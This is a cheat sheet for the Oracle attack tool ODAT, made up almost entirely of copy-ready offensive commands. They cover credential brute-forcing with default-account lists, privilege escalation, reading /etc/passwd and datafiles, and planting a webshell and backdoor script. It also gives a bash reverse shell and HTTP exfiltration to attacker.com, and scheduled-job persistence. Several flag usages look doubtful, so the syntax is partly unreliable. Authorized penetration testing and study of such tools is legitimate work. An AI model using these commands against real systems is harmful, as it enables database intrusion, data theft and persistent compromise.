Aller au contenu
1337skills 1337skills - Aide-mémoires

ODAT

Overview

ODAT (Oracle Database Attacking Tool) is a Python-based penetration testing toolkit specifically designed for Oracle Database security testing. It identifies misconfigurations, weak credentials, and exploitable vulnerabilities in Oracle Database instances. ODAT can perform reconnaissance, credential testing, privilege escalation, and code execution on vulnerable Oracle systems.

The tool combines multiple attack vectors including SQL injection, default credential testing, privilege escalation, and direct database access exploitation. It’s essential for database security professionals conducting authorized assessments of Oracle infrastructure.

Installation

Requirements

# Python 3.x
python3 --version

# pip for package management
pip3 --version

# Oracle client libraries (optional but recommended)
# Install libaio1 on Linux
sudo apt-get install libaio1 libaio-dev

Installation via Git

# Clone the repository
git clone https://github.com/quentinhardy/odat.git
cd odat

# Install dependencies
pip3 install -r requirements.txt

# Make executable
chmod +x odat.py

# Test installation
python3 odat.py --help

Installation from PyPI

# Install via pip
pip3 install odat

# Verify
odat --help

Docker Installation

# Build Docker image
docker build -t odat .

# Run in Docker
docker run -it odat --help

Basic Syntax

python3 odat.py [module] [options]
odat [module] [options]

Core Modules

ModuleDescriptionPurpose
allRun all modulesComplete assessment
tnslsnrTNS Listener reconnaissanceEnumerate services
listenerListener enumerationService discovery
tnspoisonTNS poisoningMITM attack vector
credentialstestTest default credentialsQuick credential check
utlfileUTL_FILE privilege checkFile read/write testing
utlhttpUTL_HTTP testingHTTP request capability
httpserverHTTP server moduleWeb interface access
externaltableExternal table creationData access method
dbmsxmlqueryDBMS_XMLQUERY testingXML query execution
dbmsschedulerDBMS_SCHEDULER testingScheduled job creation
javaJava execution testingCode execution path
oraexecOperating system command executionShell command access
ctxsysCTXSYS module testingContext privileges
mdsysMDSYS module testingSpatial features
silverknightSilverKnight password auditPassword strength check
passwordsPassword dictionary testingCredential brute-force

Essential Commands

CommandDescription
-h, --helpDisplay help message
-vVerbose output
-vvVery verbose output
--versionShow version
-t, --targetTarget host or IP address
-p, --portTarget database port (default: 1521)
-d, --databaseDatabase name (SID)
-U, --userUsername for authentication
-P, --passwordPassword for authentication
--accounts-fileFile with account credentials
--passwords-fileWordlist for password testing
-m, --moduleSpecific module to run
--allRun all applicable modules
-xExploit/attack mode
--outputOutput file for results

TNS Listener Enumeration

Listener Discovery

# Enumerate TNS listeners
python3 odat.py tnslsnr -t 192.168.1.100 -vv

# Output includes:
# - Version information
# - Service names
# - Instance details
# - Listener status

Service Enumeration

# Get detailed service information
python3 odat.py listener -t 192.168.1.100 -p 1521

# Lists:
# - Available database instances
# - Service names (SIDs)
# - Network aliases

Check Listener Version

# Specific listener information
python3 odat.py tnslsnr -t 192.168.1.100 -p 1521 -vv

# Useful for identifying vulnerable versions

Credential Testing

Default Credentials

# Test common Oracle default credentials
python3 odat.py credentialstest -t 192.168.1.100 -p 1521 -d ORCL -U sys -P change_on_install

# Common accounts:
# - sys / change_on_install
# - system / manager
# - scott / tiger
# - dbsnmp / dbsnmp
# - sysman / sysman

Credential Testing from Wordlist

# Test credentials from file
python3 odat.py credentialstest -t 192.168.1.100 -p 1521 -d ORCL \
  --accounts-file accounts.txt

# accounts.txt format:
# username:password
# sys:change_on_install
# system:manager

Brute-Force Testing

# Test password list against known users
python3 odat.py credentialstest -t 192.168.1.100 -p 1521 -d ORCL \
  -U system --passwords-file passwords.txt

# Test multiple users with wordlist
python3 odat.py passwords -t 192.168.1.100 -p 1521 -d ORCL \
  --users-file users.txt --passwords-file passwords.txt

Privilege Escalation

Direct Privilege Escalation

# Escalate from limited user to admin
python3 odat.py java -t 192.168.1.100 -p 1521 -d ORCL \
  -U scott -P tiger --sysdba

# Gain SYSDBA privileges
python3 odat.py oraexec -t 192.168.1.100 -p 1521 -d ORCL \
  -U system -P password -x

Vulnerable Packages Exploitation

# Exploit vulnerable Oracle packages
python3 odat.py dbmsscheduler -t 192.168.1.100 -p 1521 -d ORCL \
  -U scott -P tiger -x

# CTXSYS privilege escalation
python3 odat.py ctxsys -t 192.168.1.100 -p 1521 -d ORCL \
  -U scott -P tiger -x

# MDSYS exploitation
python3 odat.py mdsys -t 192.168.1.100 -p 1521 -d ORCL \
  -U scott -P tiger -x

File System Access

Read Files via UTL_FILE

# Read local files
python3 odat.py utlfile -t 192.168.1.100 -p 1521 -d ORCL \
  -U scott -P tiger --read /etc/passwd

# Read Oracle files
python3 odat.py utlfile -t 192.168.1.100 -p 1521 -d ORCL \
  -U scott -P tiger --read /u01/app/oracle/alert/alert_ORCL.log

Write Files via UTL_FILE

# Write files to server
python3 odat.py utlfile -t 192.168.1.100 -p 1521 -d ORCL \
  -U system -P password --write /tmp/backdoor.sh

# Create webshell
python3 odat.py utlfile -t 192.168.1.100 -p 1521 -d ORCL \
  -U system -P password --write /var/www/html/shell.jsp

Create External Tables

# Create external table for file access
python3 odat.py externaltable -t 192.168.1.100 -p 1521 -d ORCL \
  -U system -P password --read /etc/passwd

# Extract data from server
python3 odat.py externaltable -t 192.168.1.100 -p 1521 -d ORCL \
  -U scott -P tiger --read /u01/app/oracle/oradata/ORCL/system01.dbf

Code Execution

Execute Operating System Commands

# Direct OS command execution
python3 odat.py oraexec -t 192.168.1.100 -p 1521 -d ORCL \
  -U system -P password --exec "whoami"

# Execute commands via Java
python3 odat.py java -t 192.168.1.100 -p 1521 -d ORCL \
  -U scott -P tiger --exec "id"

# Create reverse shell
python3 odat.py oraexec -t 192.168.1.100 -p 1521 -d ORCL \
  -U system -P password --exec "bash -i >& /dev/tcp/attacker.com/4444 0>&1"

Scheduled Job Execution

# Use DBMS_SCHEDULER for persistence
python3 odat.py dbmsscheduler -t 192.168.1.100 -p 1521 -d ORCL \
  -U system -P password --create-job "myjob" --exec "whoami"

# Execute at specific time
python3 odat.py dbmsscheduler -t 192.168.1.100 -p 1521 -d ORCL \
  -U system -P password --create-job "myjob" --schedule "FREQ=DAILY;BYHOUR=2"

HTTP Communication

HTTP Server Access

# Check HTTP server capabilities
python3 odat.py httpserver -t 192.168.1.100 -p 1521 -d ORCL \
  -U scott -P tiger --geturl "http://attacker.com/file"

# Upload files via HTTP
python3 odat.py httpserver -t 192.168.1.100 -p 1521 -d ORCL \
  -U system -P password --putfile "shell.jsp" "attacker.com"

UTL_HTTP Exploitation

# Make HTTP requests from database
python3 odat.py utlhttp -t 192.168.1.100 -p 1521 -d ORCL \
  -U scott -P tiger --request "GET http://attacker.com/data"

# Data exfiltration via HTTP
python3 odat.py utlhttp -t 192.168.1.100 -p 1521 -d ORCL \
  -U scott -P tiger --request "POST http://attacker.com/exfil"

Network Attacks

TNS Listener Poisoning

# Poison TNS responses for MITM attack
python3 odat.py tnspoison -t 192.168.1.100 -vv

# Intercept and modify connections
# Require network access on same segment

Comprehensive Assessment

Full Database Audit

# Run all assessment modules
python3 odat.py all -t 192.168.1.100 -p 1521 -d ORCL \
  -U scott -P tiger -vv

# Includes:
# - Service enumeration
# - Credential testing
# - Privilege escalation checks
# - File access verification
# - Code execution paths

Multi-Database Assessment

# Test against multiple databases
for db in DB1 DB2 DB3; do
  python3 odat.py all -t 192.168.1.100 -p 1521 -d $db \
    -U scott -P tiger -vv --output "$db-audit.txt"
done

Vulnerability Assessment

# Check for known vulnerabilities
python3 odat.py all -t 192.168.1.100 -p 1521 -d ORCL \
  -U system -P password -vv 2>&1 | grep -i "vulnerable\|exploit\|vulnerability"

Advanced Exploitation

Chaining Multiple Exploits

#!/bin/bash
# 1. Identify valid credentials
python3 odat.py credentialstest -t 192.168.1.100 -p 1521 \
  -d ORCL --accounts-file accounts.txt > valid_creds.txt

# 2. Test for privilege escalation
python3 odat.py java -t 192.168.1.100 -p 1521 -d ORCL \
  -U scott -P tiger -vv > priv_esc.txt

# 3. Execute commands if possible
python3 odat.py oraexec -t 192.168.1.100 -p 1521 -d ORCL \
  -U system -P password --exec "cat /etc/hostname"

Persistence Mechanisms

# Create scheduled job for persistence
python3 odat.py dbmsscheduler -t 192.168.1.100 -p 1521 -d ORCL \
  -U system -P password --create-job "backdoor" \
  --exec "bash /tmp/persistence.sh" \
  --schedule "FREQ=HOURLY"

# Create stored procedure backdoor
python3 odat.py oraexec -t 192.168.1.100 -p 1521 -d ORCL \
  -U system -P password --exec "CREATE OR REPLACE PROCEDURE backdoor AS BEGIN EXECUTE IMMEDIATE 'whoami'; END;"

Data Exfiltration

# Extract sensitive data
python3 odat.py utlfile -t 192.168.1.100 -p 1521 -d ORCL \
  -U scott -P tiger --read /u01/app/oracle/oradata/

# Query database and exfiltrate
python3 odat.py oraexec -t 192.168.1.100 -p 1521 -d ORCL \
  -U scott -P tiger --exec \
  "SELECT * FROM sys.user\$ WHERE TYPE#=1" > users.txt

Password Auditing

SilverKnight Password Check

# Audit password strength
python3 odat.py silverknight -t 192.168.1.100 -p 1521 -d ORCL \
  -U sys -P change_on_install

# Identifies:
# - Weak passwords
# - Default credentials
# - Dictionary words
# - Common patterns

Password Dictionary Attack

# Brute-force with wordlist
python3 odat.py passwords -t 192.168.1.100 -p 1521 -d ORCL \
  --users-file users.txt --passwords-file /usr/share/wordlists/rockyou.txt

# Custom wordlist
python3 odat.py passwords -t 192.168.1.100 -p 1521 -d ORCL \
  --users-file users.txt --passwords-file custom-passwords.txt

Real-World Assessment Workflow

Phase 1: Reconnaissance

# Identify Oracle services
python3 odat.py tnslsnr -t 192.168.1.100 -vv

# Enumerate instances
python3 odat.py listener -t 192.168.1.100 -p 1521 -vv

Phase 2: Credential Testing

# Test default credentials
python3 odat.py credentialstest -t 192.168.1.100 -p 1521 \
  -d ORCL --accounts-file default-accounts.txt

# Brute-force weak passwords
python3 odat.py passwords -t 192.168.1.100 -p 1521 -d ORCL \
  -U system --passwords-file passwords.txt

Phase 3: Privilege Escalation

# Check for privilege escalation vectors
python3 odat.py java -t 192.168.1.100 -p 1521 -d ORCL \
  -U scott -P tiger -vv

python3 odat.py ctxsys -t 192.168.1.100 -p 1521 -d ORCL \
  -U scott -P tiger -vv

Phase 4: Exploitation

# Attempt code execution
python3 odat.py oraexec -t 192.168.1.100 -p 1521 -d ORCL \
  -U system -P password --exec "whoami"

# Extract sensitive data
python3 odat.py utlfile -t 192.168.1.100 -p 1521 -d ORCL \
  -U scott -P tiger --read /etc/passwd

Troubleshooting

Connection Issues

# Test connectivity
python3 odat.py tnslsnr -t 192.168.1.100 -p 1521 -vv

# Check firewall
telnet 192.168.1.100 1521

# Verify database name (SID)
tnsping ORCL

Authentication Failures

# Verify credentials
sqlplus scott/tiger@192.168.1.100:1521/ORCL

# Check user privileges
python3 odat.py credentialstest -t 192.168.1.100 -p 1521 \
  -d ORCL -U scott -P tiger -vv

Module Execution Errors

# Enable verbose output
python3 odat.py <module> -t <target> -vv

# Check Python version
python3 --version

# Verify dependencies
pip3 list | grep cx_Oracle

Security Considerations

  • Obtain written authorization before testing
  • Use ODAT in controlled lab environments only
  • Minimize impact on production systems
  • Document all activities and findings
  • Use appropriate network isolation
  • Maintain confidentiality of assessment results
  • Follow organizational security policies
  • Implement proper logging and monitoring
  • sqlplus - Oracle command-line client
  • SQLMap - SQL injection testing tool
  • Metasploit - General penetration testing framework
  • Burp Suite - Web application testing (for web-based access)
  • tnsping - Oracle TNS connectivity tool
  • nmap - Network discovery and scanning

References

  • ODAT GitHub: https://github.com/quentinhardy/odat
  • Oracle Database documentation
  • OWASP Database Security
  • CVE Oracle Database vulnerabilities
  • Authorized penetration testing methodologies
  • Responsible disclosure guidelines